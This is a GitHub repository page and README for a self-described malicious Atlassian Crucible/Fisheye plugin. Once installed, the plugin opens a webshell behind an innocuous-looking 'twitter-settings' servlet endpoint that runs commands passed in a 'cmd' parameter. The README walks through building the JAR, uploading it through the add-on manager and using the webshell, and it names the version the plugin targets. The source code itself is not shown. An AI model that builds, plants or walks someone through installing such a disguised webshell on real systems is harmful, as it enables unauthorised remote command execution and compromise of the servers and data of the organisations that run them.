Skip to content
/ fecru-webshell-plugin Public

A malicious plugin for Atlassian Crucible/Fisheye that when installed gives command execution

License

View license
0 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

UgniusV/fecru-webshell-plugin

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
src
src
 
 
target
target
 
 
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
pom.xml
pom.xml
 
 

Repository files navigation

Summary

A malicious plugin for Atlassian Crucible/Fisheye that when installed gives command execution via /plugins/servlet/twitter-settings?cmd=id endpoint

Usage

  1. Install Atlassian Plugin SDK. E.g. for MacOS:
brew tap atlassian/tap
brew install atlassian/tap/atlassian-plugin-sdk
  1. Clone this repo & cd into it
git clone https://github.com/UgniusV/fecru-webshell-plugin.git
cd fecru-webshell-plugin
  1. Generate a JAR by running
atlas-package
  1. Generated JAR is now placed at ./target/fecrutwitter-1.0.0-SNAPSHOT.jar
  2. Navigate to http://crucible:8060/plugins/servlet/upm?source=side_nav_manage_addons & install the JAR
  3. Enjoy your webshell at: http://crucible:8060/plugins/servlet/twitter-settings?cmd=id

Important note

Currently this plugin is designed to work with Crucible/Fisheye 4.8.11. If you would like to install it on another version, please change the versions & build numbers accordingly inside pom.xml

        <fecru.version>4.8.11-20221216114657</fecru.version>
        <fecru.data.version>4.8.11-20221216114657</fecru.data.version>

About

A malicious plugin for Atlassian Crucible/Fisheye that when installed gives command execution

Resources

Readme

License

View license
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases 1

v1.0.0 Latest
Mar 11, 2023

Packages

No packages published

Languages